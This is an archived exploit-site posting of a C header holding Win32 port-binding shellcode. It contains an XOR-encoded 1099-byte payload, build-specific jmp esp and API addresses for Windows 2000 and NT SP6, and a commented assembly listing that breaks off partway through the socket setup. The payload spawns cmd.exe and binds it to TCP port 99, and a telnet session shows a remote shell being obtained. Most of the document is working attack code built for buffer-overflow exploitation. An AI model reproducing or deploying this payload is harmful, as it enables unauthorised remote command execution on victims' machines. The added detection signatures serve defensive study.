
winshellcode.h
Posted Sep 28, 2000
Authored by sunx | Site cnns.net

WinShellCode. win32 portbinding shellcode.

tags | exploit, shellcode
systems | windows
SHA-256 | 4359c1d127a45198387c46cccc11eb6234af6fa024f2e4666bbbb918a9669a75

/******************************************************************************
**************************

WinShellCode, written by sunx
sunx@cnns.net, https://www.cnns.net

This shellcode works like most remote UNIX shells:

it listens on port 99;
when a client connects to this port (e.g. with telnet), a cmd.exe shell becomes active.

The asm source follows below.

To remove char(0) bytes from the data,
the shellcode is XORed with 0x99; it decodes itself at run time.

At the moment of the overflow, the run-time memory layout is:

-------------------RRRR-NOPNOPNOPNOPNOPNOPNOP-ShellCodeShellCodeShellCode------
-------------
^ ^
| |
| |
ESP point to here shellcode place here

ESP must be lower than the shellcode's start address when this shellcode runs (the entry stub scans upward from ESP for its marker).

[root@Linux /]# telnet 192.168.0.5 99
Trying 192.168.0.5...
Connected to sunx (192.168.0.5).
Escape character is '^]'.
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

E:\work\asm\winshell\conv>cd \

cd \

E:\>^]q

Connection closed.
[root@Linux /]# telnet 192.168.0.5 99
Trying 192.168.0.5...
Connected to sunx (192.168.0.5).
Escape character is '^]'.

E:\>c:

c:

C:\>

*******************************************************************************
*************************/

#ifndef WINSHELLCODE_H
#define WINSHELLCODE_H

/* Byte offsets into shellcode[] of the three patchable fields: the
 * LoadLibraryA address slot, the GetProcAddress address slot and the
 * "cmd.exe$" command line.  The two address slots sit inside the
 * XOR-0x99-encoded region of the payload (everything from `main` up to the
 * 'sunx' marker in the asm listing is encoded), so the bytes found at these
 * offsets are the encoded form of the address, not the raw value. */
const unsigned long OfsShellCodeLoadLib = 0x436;
const unsigned long OfsShellCodeGetProc = 0x43a;
const unsigned long OfsShellCodeShell = 0x442;

/* Address of a `jmp esp` instruction used as the overwritten return address
 * (the "RRRR" in the layout diagram above) on the two builds the author
 * tested: Windows 2000 build 2195 and Windows NT SP6.  All of these are
 * absolute, build-specific addresses - the payload is neither position- nor
 * version-independent and only runs on these exact builds. */
const unsigned long JMPESP_Win2k2195 = 0x77e6898b;
const unsigned long JMPESP_WinNTsp6 = 0x77f0eac3;

/* LoadLibraryA / GetProcAddress for Windows 2000 build 2195.  These are the
 * values the asm listing hard-codes (LoadLibrary dd 77e67273h,
 * GetProcAddr dd 77e67031h) and that the shellcode[] array carries. */
const unsigned long LoadLib_Win2k2195 = 0x77e67273;
const unsigned long GetProc_Win2k2195 = 0x77e67031;

/* The same two exports for Windows NT SP6. */
const unsigned long LoadLib_WinNTsp6 = 0x77ee391a;
const unsigned long GetProc_WinNTsp6 = 0x77ee4111;

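/*
 * Raw bound-shell payload, 0x44b (1099) bytes.  The archive rendering had
 * wrapped several hex literals across line breaks (e.g. "0" / "xfb"), which
 * does not compile; the bytes below are the same values, 16 per line.
 *
 * Layout, from the asm listing below and the Ofs* constants above:
 *   0x000-0x025  decoder stub (plaintext): finds its own base by scanning
 *                upward from ESP for the dword 'sunx', then XORs every byte
 *                from 0x026 with 0x99 in place until it reaches the marker
 *                at 0x43e.
 *   0x026-0x435  encoded body: import resolution, pipe/socket setup, the
 *                accept/relay loop and the API name table.  0x99 bytes here
 *                are encoded zeros.
 *   0x436        OfsShellCodeLoadLib: 4-byte LoadLibraryA address slot.
 *   0x43a        OfsShellCodeGetProc: 4-byte GetProcAddress address slot.
 *                Both slots lie inside the encoded region, so they hold the
 *                XOR-0x99 form of the address (here the Windows 2000 build
 *                2195 values LoadLib_Win2k2195 / GetProc_Win2k2195).
 *   0x43e        'sunx' marker (plaintext): the decoder's stop condition.
 *   0x442        OfsShellCodeShell: "cmd.exe$" (plaintext); the stub scans
 *                at most 32 bytes for '$' and replaces it with NUL.
 *   0x44a        trailing 0.
 * The listener binds TCP port 99 on all interfaces (sin_port 6300h in the
 * asm).  Detection note: the plaintext decoder prologue
 * (8b fc b8 "sunx" 47 39 07 75 fb) and the plaintext 'sunx' marker are
 * stable byte signatures for this payload.
 */
unsigned char shellcode[]=
{
0x8b, 0xfc, 0xb8, 0x73, 0x75, 0x6e, 0x78, 0x47, 0x39, 0x07, 0x75, 0xfb, 0x8d, 0x6f, 0xfd, 0x8d,
0x7d, 0x26, 0x90, 0x90, 0x90, 0x8b, 0xf7, 0xb4, 0x99, 0xfc, 0xac, 0x32, 0xc4, 0xaa, 0x81, 0x3e,
0x73, 0x75, 0x6e, 0x78, 0x75, 0xf4, 0x14, 0x24, 0xdb, 0x9d, 0x99, 0x99, 0x65, 0xaa, 0x50, 0x28,
0xb9, 0x29, 0xbd, 0x6b, 0x37, 0x5f, 0xde, 0x66, 0x99, 0x71, 0x4c, 0x9b, 0x99, 0x99, 0x71, 0x41,
0x98, 0x99, 0x99, 0x10, 0x1c, 0xb3, 0x9d, 0x99, 0x99, 0x71, 0x44, 0x98, 0x99, 0x99, 0x71, 0xcb,
0x9b, 0x99, 0x99, 0x10, 0x1c, 0xb7, 0x9d, 0x99, 0x99, 0x71, 0x9d, 0x98, 0x99, 0x99, 0x12, 0x1c,
0xb7, 0x9d, 0x99, 0x99, 0x71, 0x88, 0x9b, 0x99, 0x99, 0x10, 0x1c, 0xab, 0x9d, 0x99, 0x99, 0x71,
0x9b, 0x99, 0x99, 0x99, 0x72, 0x71, 0x12, 0x1c, 0x8f, 0x9d, 0x99, 0x99, 0x71, 0x28, 0x99, 0x99,
0x99, 0x1a, 0x61, 0x99, 0xed, 0xc0, 0x09, 0x09, 0x09, 0x09, 0xaa, 0x59, 0xc9, 0x14, 0x1c, 0xbf,
0x9d, 0x99, 0x99, 0xc9, 0xaa, 0x59, 0x2d, 0x9d, 0xc9, 0x12, 0x1c, 0xb3, 0x9d, 0x99, 0x99, 0xc9,
0x12, 0x1c, 0x8f, 0x9d, 0x99, 0x99, 0xc9, 0x66, 0x0c, 0x55, 0x9a, 0x99, 0x99, 0x1a, 0x61, 0x99,
0xed, 0xe4, 0x09, 0x09, 0x09, 0x09, 0xaa, 0x59, 0xc9, 0x12, 0x1c, 0xbf, 0x9d, 0x99, 0x99, 0xc9,
0x12, 0x1c, 0xb3, 0x9d, 0x99, 0x99, 0xc9, 0x12, 0x1c, 0xab, 0x9d, 0x99, 0x99, 0xc9, 0x66, 0x0c,
0x93, 0x9d, 0x99, 0x99, 0x1a, 0x61, 0x99, 0xe5, 0xcf, 0x09, 0x09, 0x09, 0x09, 0x72, 0x0e, 0xaa,
0x59, 0xc9, 0x2d, 0x9d, 0xc9, 0x12, 0x1c, 0xb3, 0x9d, 0x99, 0x99, 0xc9, 0x12, 0x1c, 0xab, 0x9d,
0x99, 0x99, 0xc9, 0x66, 0x0c, 0x96, 0x9d, 0x99, 0x99, 0x1a, 0x61, 0x99, 0xe5, 0xa8, 0x09, 0x09,
0x09, 0x09, 0xaa, 0x42, 0xca, 0x14, 0x04, 0xbf, 0x9d, 0x99, 0x99, 0xca, 0xc9, 0x12, 0x1c, 0xb3,
0x9d, 0x99, 0x99, 0xc9, 0x12, 0x1c, 0xbb, 0x9d, 0x99, 0x99, 0xc9, 0x66, 0x0c, 0x5b, 0x9a, 0x99,
0x99, 0x1a, 0x61, 0x99, 0xed, 0x90, 0x09, 0x09, 0x09, 0x09, 0x70, 0xde, 0x66, 0x66, 0x66, 0xaa,
0x59, 0x5a, 0xaa, 0x42, 0xca, 0x14, 0x04, 0xc7, 0x98, 0x99, 0x99, 0xca, 0xaa, 0x42, 0xca, 0xca,
0xca, 0xc9, 0x66, 0x0c, 0x31, 0x9a, 0x99, 0x99, 0x1a, 0x61, 0x99, 0xed, 0x92, 0x09, 0x09, 0x09,
0x09, 0x12, 0x1c, 0xc7, 0x98, 0x99, 0x99, 0x5a, 0x21, 0x99, 0x99, 0x99, 0x99, 0x5a, 0x99, 0x99,
0x99, 0x99, 0x14, 0x1c, 0x52, 0x98, 0x99, 0x99, 0x5e, 0x99, 0xdd, 0x99, 0x99, 0x99, 0xc9, 0x66,
0x0c, 0xe4, 0x9a, 0x99, 0x99, 0x12, 0x1c, 0x83, 0x9d, 0x99, 0x99, 0x10, 0x1c, 0x92, 0x9b, 0x99,
0x99, 0x10, 0x1c, 0x9e, 0x9b, 0x99, 0x99, 0x12, 0x1c, 0x87, 0x9d, 0x99, 0x99, 0x10, 0x1c, 0x9a,
0x9b, 0x99, 0x99, 0xaa, 0x59, 0xff, 0x21, 0x98, 0x98, 0x10, 0x1c, 0x6e, 0x98, 0x99, 0x99, 0x14,
0x1c, 0x52, 0x98, 0x99, 0x99, 0xc9, 0xc9, 0xaa, 0x59, 0xc9, 0xc9, 0xc9, 0xd9, 0xc9, 0xd1, 0xc9,
0xc9, 0x14, 0x1c, 0xdb, 0x9d, 0x99, 0x99, 0xc9, 0xaa, 0x59, 0xc9, 0x66, 0x0c, 0x14, 0x9a, 0x99,
0x99, 0x1a, 0x61, 0x99, 0x96, 0x1d, 0xdb, 0x98, 0x99, 0x99, 0x5a, 0x99, 0x99, 0x99, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0xaa, 0x59, 0x2d, 0x9d, 0xc9,
0x58, 0x71, 0x9d, 0xc9, 0x66, 0x0c, 0x2f, 0x9a, 0x99, 0x99, 0x5a, 0xaa, 0x59, 0xc9, 0x14, 0x1c,
0xf7, 0x9b, 0x99, 0x99, 0x5e, 0x99, 0x95, 0x99, 0x99, 0x99, 0xc9, 0x14, 0x1c, 0x83, 0x9d, 0x99,
0x99, 0xc9, 0x14, 0x1c, 0x8f, 0x9d, 0x99, 0x99, 0xc9, 0x66, 0x0c, 0xeb, 0x9a, 0x99, 0x99, 0xaa,
0x59, 0xc9, 0x14, 0x1c, 0xf7, 0x9b, 0x99, 0x99, 0xc9, 0x14, 0x1c, 0xbb, 0x9d, 0x99, 0x99, 0xc9,
0x14, 0x1c, 0x87, 0x9d, 0x99, 0x99, 0xc9, 0x66, 0x0c, 0xeb, 0x9a, 0x99, 0x99, 0x5a, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x98, 0x99, 0x99, 0x99, 0xc9, 0x14, 0x04, 0x38, 0x9b, 0x99,
0x99, 0x5e, 0x9a, 0x89, 0x99, 0x99, 0x99, 0xca, 0x14, 0x04, 0x65, 0x9b, 0x99, 0x99, 0xca, 0xc9,
0x66, 0x0c, 0x9a, 0x9d, 0x99, 0x99, 0x12, 0x41, 0x1a, 0x61, 0x99, 0xc1, 0xe5, 0x45, 0x12, 0x5a,
0x5a, 0x89, 0x99, 0x99, 0x99, 0xaa, 0x59, 0xc9, 0xd9, 0xc9, 0xd9, 0xc9, 0x66, 0x0c, 0x69, 0x9a,
0x99, 0x99, 0x1a, 0x61, 0x66, 0xed, 0xdb, 0x09, 0x09, 0x09, 0x09, 0x10, 0x1c, 0xb7, 0x9d, 0x99,
0x99, 0xf3, 0x89, 0x14, 0x04, 0x65, 0x9b, 0x99, 0x99, 0xca, 0xc9, 0x66, 0x0c, 0x6e, 0x9a, 0x99,
0x99, 0x1a, 0x61, 0x99, 0xec, 0xba, 0x09, 0x09, 0x09, 0x09, 0xf3, 0x9c, 0x12, 0x1c, 0xb7, 0x9d,
0x99, 0x99, 0xc9, 0x66, 0x0c, 0x65, 0x9a, 0x99, 0x99, 0x1a, 0x61, 0x99, 0xec, 0x92, 0x09, 0x09,
0x09, 0x09, 0x12, 0x1c, 0xb7, 0x9d, 0x99, 0x99, 0x5a, 0xaa, 0x59, 0x5a, 0x9b, 0x99, 0x99, 0xfa,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x66, 0x0c, 0x42, 0x9a,
0x99, 0x99, 0x5a, 0x14, 0x24, 0xf0, 0x9a, 0x99, 0x99, 0x12, 0x5e, 0xce, 0x71, 0xb6, 0x99, 0x99,
0x99, 0xc6, 0xc9, 0xab, 0x59, 0xaa, 0x50, 0x6e, 0x48, 0x65, 0x6b, 0x37, 0xc1, 0x19, 0xa6, 0x99,
0xed, 0x8e, 0x09, 0x09, 0x09, 0x09, 0xc9, 0xce, 0x12, 0x46, 0x71, 0x84, 0x99, 0x99, 0x99, 0xc6,
0x10, 0x9e, 0xc1, 0xde, 0xde, 0xde, 0xde, 0x72, 0x40, 0xde, 0x19, 0xa6, 0x99, 0xec, 0x53, 0x5a,
0xca, 0x14, 0x04, 0xaf, 0x9d, 0x99, 0x99, 0xc9, 0x66, 0x8a, 0xc2, 0x5a, 0xce, 0x14, 0x24, 0xa3,
0x9d, 0x99, 0x99, 0xca, 0xc9, 0x66, 0x8e, 0xc6, 0x5a, 0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa,
0xab, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xfc, 0xed,
0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff, 0xf6, 0xd8, 0x99, 0xda, 0xeb, 0xfc,
0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0xd8, 0x99, 0xda, 0xf5, 0xf6, 0xea,
0xfc, 0xd1, 0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8, 0xf4, 0xfc,
0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb, 0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6,
0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed, 0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xcb, 0xfc, 0xf8, 0xfd,
0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0, 0xed, 0xc9,
0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0x99, 0xce, 0xca, 0xd6, 0xda, 0xd2, 0xaa, 0xab, 0x99,
0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99, 0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed,
0xfc, 0xf7, 0x99, 0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99, 0xeb,
0xfc, 0xfa, 0xef, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0xea, 0xeb, 0x7f, 0xee, // 0x436: LoadLibraryA address, OS-build dependent (stored XOR 0x99)
0xa8, 0xe9, 0x7f, 0xee, // 0x43a: GetProcAddress address, OS-build dependent (stored XOR 0x99)
0x73, 0x75, 0x6e, 0x78, // 0x43e: 'sunx' decode-stop marker; do not modify
0x63, 0x6d, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x24, // 0x442: "cmd.exe$" - '$'-terminated command line, at most 32 bytes are scanned
0x00
};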

/******************************************************************************
**************************

;******************************************************************************
*********************
; Written by sunx
;******************************************************************************
*********************

.486                                    ; 386+/486 instruction set (TASM-style source: `locals`, `label`, `@@` labels)

.model flat                             ; flat 32-bit model, no segment fixups

locals                                  ; enable @@-prefixed labels scoped to each proc

.code

;-----------------------------------------------------------------------------
; Entry point.  Only this stub (up to `main`) is stored in plaintext in the
; C array; everything from `main` up to the `dd 'xnus'` marker at the end of
; the data block is XOR 0x99 and is decoded in place here.
;
; In:   esp below shellcodebegin (see header comment), with no other copy of
;       the dword 'sunx' between esp and the code.
; Out:  never returns; loops in runloop accepting one client at a time.
; Regs: ebp = run-time address of shellcodebegin for the rest of the code;
;       every data reference is [ebp + offset X - offset shellcodebegin].
;-----------------------------------------------------------------------------
shellcodebegin:

mov edi, esp
mov eax, 'xnus'                         ; the imm32 of this instruction (at shellcodebegin+3) is the
                                        ; first 'sunx' the scan below meets when esp is below the code
findnext: inc edi                       ; scan upward one byte at a time
cmp [edi], eax
jnz findnext

lea ebp, [edi + offset shellcodebegin - offset findnext + 4 ]   ; findnext = begin+7, so ebp = edi-3 = shellcodebegin

lea edi, [ebp + offset main - offset shellcodebegin]           ; decode window starts at main
mov esi, edi
mov ah, 99h                             ; XOR key
cld

xorloop:
lodsb
xor al, ah
stosb
cmp dword ptr [esi], 'xnus'             ; stop when the next dword is the plaintext marker
jnz xorloop

main: lea edi, [ebp + offset cmd - offset shellcodebegin]
cld
xor ecx, ecx
mov cl, 32                              ; scan at most 32 bytes of cmd
mov al, '$'
repnz scasb                             ; look for the '$' after "cmd.exe"
mov byte ptr [edi-1], 0                 ; edi is one past the match: NUL-terminate the command line

call processapi                         ; resolve the KERNEL32 / WSOCK32 imports in place
call initpbuf                           ; 0x400-byte zeroed I/O buffer
mov [ebp + offset pbuf - offset shellcodebegin], eax
call initpipe                           ; pipe A: cmd.exe stdout/stderr -> here; pipe B: here -> cmd.exe stdin
call initsock                           ; socket/bind/listen on TCP 99, all interfaces
mov [ebp + offset accepthand - offset shellcodebegin], eax   ; stored unchecked: 0 on failure
call initshell                          ; spawn cmd.exe once, std handles on the pipes

runloop:
mov eax, [ebp + offset accepthand - offset shellcodebegin]
call getaconnect                        ; blocks until a client connects

mov [ebp + offset sockhand - offset shellcodebegin], eax

call runshell                           ; relay until a pipe or socket error

jmp runloop                             ; sockhand is never closed before the next accept

;******************************************************************************
*************************;*****************************************************
**************************************************;****************************
***************************************************************************


;-----------------------------------------------------------------------------
; runshell - relay loop between the client socket and the cmd.exe pipes.
; In:   sockhand, pipeAread, pipeBwrite and pbuf filled in by the caller.
; Out:  eax = 0; returns on a failed ReadFile/WriteFile or a negative
;       (SOCKET_ERROR) send/recv result.
; Clobb: eax, ebx, flags.  Nothing is closed on exit.
; Uses the 0x400-byte pbuf and `i` as the bytes-transferred slot.
; NOTE(review): recv returning 0 (peer closed) is not an exit condition -
; only a negative result is - so a 0-byte WriteFile is issued and the loop
; continues; whether that spins depends on Winsock's behaviour on the closed
; socket.  PeekNamedPipe is polled with no Sleep between iterations.
;-----------------------------------------------------------------------------
runshell proc

@@peek: mov eax, [ebp + offset pipeAread - offset shellcodebegin]
call peekdata                           ; eax = bytes the child has written to pipe A (0 = none, or error)
cmp eax, 0
jz @@readinput                          ; nothing from the child: wait for client input instead

;readfile()  ReadFile(pipeAread, pbuf, 0x400, &i, NULL)
xor eax, eax
push eax                                ; lpOverlapped = NULL

lea eax, [ebp + offset i - offset shellcodebegin]
push eax                                ; lpNumberOfBytesRead = &i

xor eax, eax
mov ah, 4
push eax                                ; nNumberOfBytesToRead = 0x400 (size of pbuf)

mov eax, [ebp + offset pbuf - offset shellcodebegin]
push eax                                ; lpBuffer = pbuf

mov eax, [ebp + offset pipeAread - offset shellcodebegin]
push eax                                ; hFile = read end of pipe A
call [ebp + offset readfile - offset shellcodebegin]   ; slot patched over the "ReadFile" name by processapi

cmp eax, 0
jz @@exit                               ; ReadFile failed (e.g. pipe broken because cmd.exe exited)

;send()  send(sockhand, pbuf, i, 0)
xor eax, eax
push eax                                ; flags = 0
mov eax, [ebp + offset i - offset shellcodebegin]
push eax                                ; len = bytes just read
mov eax, [ebp + offset pbuf - offset shellcodebegin]
push eax                                ; buf
mov eax, [ebp + offset sockhand - offset shellcodebegin]
push eax                                ; s

call [ebp + offset send - offset shellcodebegin]
;call [ebp + offset wsagetlasterror - offset shellcodebegin]

cmp eax, 0
jl @@exit                               ; SOCKET_ERROR (-1): signed compare is intentional

jmp @@peek

@@readinput:                            ; recv(sockhand, pbuf, 0x400, 0) - blocks until the client sends
xor eax, eax
push eax                                ; flags = 0
mov ah, 4
push eax                                ; len = 0x400
mov eax, [ebp + offset pbuf - offset shellcodebegin]
push eax                                ; buf
mov eax, [ebp + offset sockhand - offset shellcodebegin]
push eax                                ; s
call [ebp + offset recv - offset shellcodebegin]
cmp eax, 0
jl @@exit                               ; only SOCKET_ERROR exits; a 0-byte result falls through

xor ebx, ebx
push ebx                                ; lpOverlapped = NULL

lea ebx, [ebp + offset i - offset shellcodebegin]
push ebx                                ; lpNumberOfBytesWritten = &i

push eax                                ; nNumberOfBytesToWrite = bytes received

mov eax, [ebp + offset pbuf - offset shellcodebegin]
push eax                                ; lpBuffer = pbuf
mov eax, [ebp + offset pipeBwrite - offset shellcodebegin]
push eax                                ; hFile = write end of pipe B (cmd.exe stdin)
call [ebp + offset writefile - offset shellcodebegin]

cmp eax, 0
jz @@exit                               ; WriteFile failed

jmp @@peek

@@exit: xor eax, eax                    ; eax = 0; the client socket is left open for the caller

ret

runshell endp

;******************************************************************************
*************************
;-----------------------------------------------------------------------------
; peekdata - PeekNamedPipe(h, NULL, 0, NULL, &peeki, NULL).
; In:   eax = pipe handle.
; Out:  eax = total bytes available to read; 0 when the call fails, which
;       the caller cannot tell apart from "nothing available".
; Clobb: ebx, flags.
; peeki is stored inside the proc body (in the encoded region); the code
; returns before reaching it.
;-----------------------------------------------------------------------------
peekdata proc ;call with eax = pipehand, return eax = bytes available to read

xor ebx, ebx
push ebx                                ; lpBytesLeftThisMessage = NULL
lea ebx, [ebp + offset peeki - offset shellcodebegin]
push ebx                                ; lpTotalBytesAvail = &peeki

xor ebx, ebx
push ebx                                ; lpBytesRead = NULL
push ebx                                ; nBufferSize = 0
push ebx                                ; lpBuffer = NULL (count only, no data is copied)

push eax                                ; hNamedPipe

call [ebp + offset peeknamedpipe - offset shellcodebegin]
cmp eax, 0
jz @@error                              ; FALSE: broken pipe (e.g. cmd.exe exited) or other failure

mov eax, [ebp + offset peeki - offset shellcodebegin]

ret

@@error: mov eax, 0                     ; same value as "nothing available"
ret

peeki dd 0                              ; output slot, lives inside the proc body
peekdata endp

;******************************************************************************
*************************
;-----------------------------------------------------------------------------
; initshell - spawn cmd.exe with its std handles redirected to the pipes.
; In:   pipeAwrite, pipeBread and cmd set up by initpipe / main.
; Out:  returns on success; on CreateProcessA failure jumps to exitshell
;       (ExitProcess) and never returns.
; Clobb: eax, flags.
; StartupInfo (0x50 bytes) doubles as the PROCESS_INFORMATION buffer, so
; the first 16 bytes of the STARTUPINFOA are overwritten by the call; the
; returned hProcess/hThread handles are never closed.
;-----------------------------------------------------------------------------
initshell proc
lea eax, [ebp + offset StartupInfo - offset shellcodebegin]
mov dword ptr [eax], 044h               ; STARTUPINFOA.cb = 0x44 = sizeof(STARTUPINFOA)
push eax
call [ebp + offset getstartupinfo - offset shellcodebegin]   ; GetStartupInfoA(&StartupInfo): fills the rest from the host process

;build startinfo
mov eax, [ebp + offset pipeAwrite - offset shellcodebegin]
mov [ebp + offset StartupInfo - offset shellcodebegin + 40h], eax   ; hStdError  = write end of pipe A

mov [ebp + offset StartupInfo - offset shellcodebegin + 3ch], eax   ; hStdOutput = write end of pipe A

mov eax, [ebp + offset pipeBread - offset shellcodebegin]
mov [ebp + offset StartupInfo - offset shellcodebegin + 38h], eax   ; hStdInput  = read end of pipe B


xor eax, eax
mov ax, 0101h                           ; STARTF_USESTDHANDLES (0x100) | STARTF_USESHOWWINDOW (0x1)
mov [ebp + offset StartupInfo - offset shellcodebegin +2Ch], eax   ; dwFlags; wShowWindow (+30h) keeps whatever GetStartupInfoA returned

lea eax, [ebp + offset StartupInfo - offset shellcodebegin]
push eax                                ; lpProcessInformation - same buffer as the STARTUPINFOA
push eax                                ; lpStartupInfo

xor eax, eax
push eax                                ; lpCurrentDirectory = NULL
push eax                                ; lpEnvironment = NULL
push eax                                ; dwCreationFlags = 0
inc eax
push eax                                ; bInheritHandles = TRUE (child must inherit the pipe ends)
dec eax
push eax                                ; lpThreadAttributes = NULL
push eax                                ; lpProcessAttributes = NULL

lea eax, [ebp + offset cmd - offset shellcodebegin]
push eax                                ; lpCommandLine = "cmd.exe" (NUL-terminated by main)
xor eax, eax
push eax                                ; lpApplicationName = NULL
call [ebp + offset createprocess - offset shellcodebegin]   ; CreateProcessA

cmp eax, 0
jz exitshell                            ; failure: jump (not call) into exitshell, which calls ExitProcess

ret

StartupInfo db 50h dup(0)               ; 0x50 bytes: STARTUPINFOA (0x44) / PROCESS_INFORMATION (0x10); inside the encoded region
initshell endp

;******************************************************************************
*************************

;-----------------------------------------------------------------------------
; initpbuf - allocate the shared I/O buffer.
; Out:  eax = GlobalAlloc(GMEM_ZEROINIT, 0x400); NULL on failure, unchecked
;       by the caller.
; Clobb: eax, flags.
;-----------------------------------------------------------------------------
initpbuf proc ;return eax = buf
xor eax, eax
mov ah, 4                               ; eax = 0x400
push eax                                ; dwBytes = 0x400 (matches the read/recv sizes in runshell)
shr eax, 4                              ; eax = 0x40 = GMEM_ZEROINIT
push eax                                ; uFlags
call [ebp + offset globalalloc - offset shellcodebegin]
ret
initpbuf endp

;******************************************************************************
*************************

;-----------------------------------------------------------------------------
; initpipe - create the two anonymous pipes used to talk to cmd.exe.
;   pipe A: pipeAread (read here) / pipeAwrite (child stdout+stderr)
;   pipe B: pipeBread (child stdin) / pipeBwrite (written here)
; Out:  the four handle slots filled in; CreatePipe's return value is not
;       checked, so a failure leaves zeros behind.
; Clobb: eax, flags.
; Both ends of each pipe are created inheritable (bInherit = 1 in
; pipeattr), so the child also receives this side's handles.
;-----------------------------------------------------------------------------
initpipe proc
xor eax, eax
push eax                                ; nSize = 0 (default buffer size)
lea eax, [ebp + offset pipeattr - offset shellcodebegin]
mov dword ptr [eax], 0ch                ; SECURITY_ATTRIBUTES.nLength = 12
push eax                                ; lpPipeAttributes
lea eax, [ebp + offset pipeAwrite - offset shellcodebegin]
push eax                                ; hWritePipe -> pipeAwrite
lea eax, [ebp + offset pipeAread - offset shellcodebegin]
push eax                                ; hReadPipe  -> pipeAread
call [ebp + offset createpipe - offset shellcodebegin]   ; CreatePipe, result ignored

xor eax, eax
push eax                                ; nSize = 0
lea eax, [ebp + offset pipeattr - offset shellcodebegin]
push eax                                ; lpPipeAttributes (same structure)
lea eax, [ebp + offset pipeBwrite - offset shellcodebegin]
push eax                                ; hWritePipe -> pipeBwrite
lea eax, [ebp + offset pipeBread - offset shellcodebegin]
push eax                                ; hReadPipe  -> pipeBread
call [ebp + offset createpipe - offset shellcodebegin]   ; CreatePipe, result ignored

ret

pipeattr label                          ; SECURITY_ATTRIBUTES, stored inside the proc body
len dd 0                                ; nLength, written as 0ch at run time
lpSecDesc dd 0                          ; lpSecurityDescriptor = NULL
bInherit dd 1                           ; bInheritHandle = TRUE

initpipe endp

;******************************************************************************
*************************

;-----------------------------------------------------------------------------
; getaconnect - block in accept() until a client connects; retries forever
; on failure.
; In:   eax = listening socket.
; Out:  eax = accepted client socket.
; Clobb: ebx, flags.  sockstruc (the bind address) is reused as the peer
;        address output buffer and overwritten; bind has already happened.
;-----------------------------------------------------------------------------
getaconnect proc ;return eax = sock, call with eax = sock

@@next: push eax                        ; keep the listening socket across the call
lea ebx, [ebp + offset @@accepti - offset shellcodebegin]
mov dword ptr [ebx], 16                 ; addrlen = sizeof(sockaddr_in), reset each iteration

push ebx                                ; addrlen
lea ebx, [ebp + offset sockstruc - offset shellcodebegin]
push ebx                                ; addr (reuses the bind structure)
push eax                                ; s

call [ebp + offset accept - offset shellcodebegin]
mov ebx, eax
cmp eax, 0
pop eax                                 ; pop does not touch flags, so jl still tests accept's result
jl @@next                               ; INVALID_SOCKET (-1): retry
mov eax, ebx
ret
@@accepti dd 16                         ; addrlen slot, inside the proc body
getaconnect endp

;******************************************************************************
*************************
;-----------------------------------------------------------------------------
; initsock - socket(AF_INET, SOCK_STREAM, 0); bind to 0.0.0.0:99; listen(5).
; Out:  eax = listening socket, or 0 on any failure (the caller stores it
;       unchecked, after which getaconnect would retry accept on it forever).
; Clobb: eax, ebx, flags.  Also stores the socket in accepthand itself.
; No WSAStartup is made: this relies on the host process having already
; initialised Winsock.
;-----------------------------------------------------------------------------
initsock proc ; return eax = sock


;socket()   socket(AF_INET, SOCK_STREAM, 0)
xor eax, eax
push eax                                ; protocol = 0
inc eax
push eax                                ; type = SOCK_STREAM (1)
inc eax
push eax                                ; af = AF_INET (2)
call [ebp + offset socket - offset shellcodebegin]
cmp eax , 0ffffffffh                    ; INVALID_SOCKET
jz @@exit

mov [ebp + offset accepthand - offset shellcodebegin], eax


;bind()     bind(s, &sockstruc, 16)

push 10h                                ; namelen = sizeof(sockaddr_in)
lea ebx, [ebp + offset sockstruc - offset shellcodebegin]
push ebx                                ; name
push eax                                ; s
call [ebp + offset bind - offset shellcodebegin]
cmp eax , 0
jnz @@exit                              ; SOCKET_ERROR (e.g. port already in use)

;listen()   listen(s, 5)
push 5                                  ; backlog
mov eax, [ebp + offset accepthand - offset shellcodebegin]
push eax                                ; s

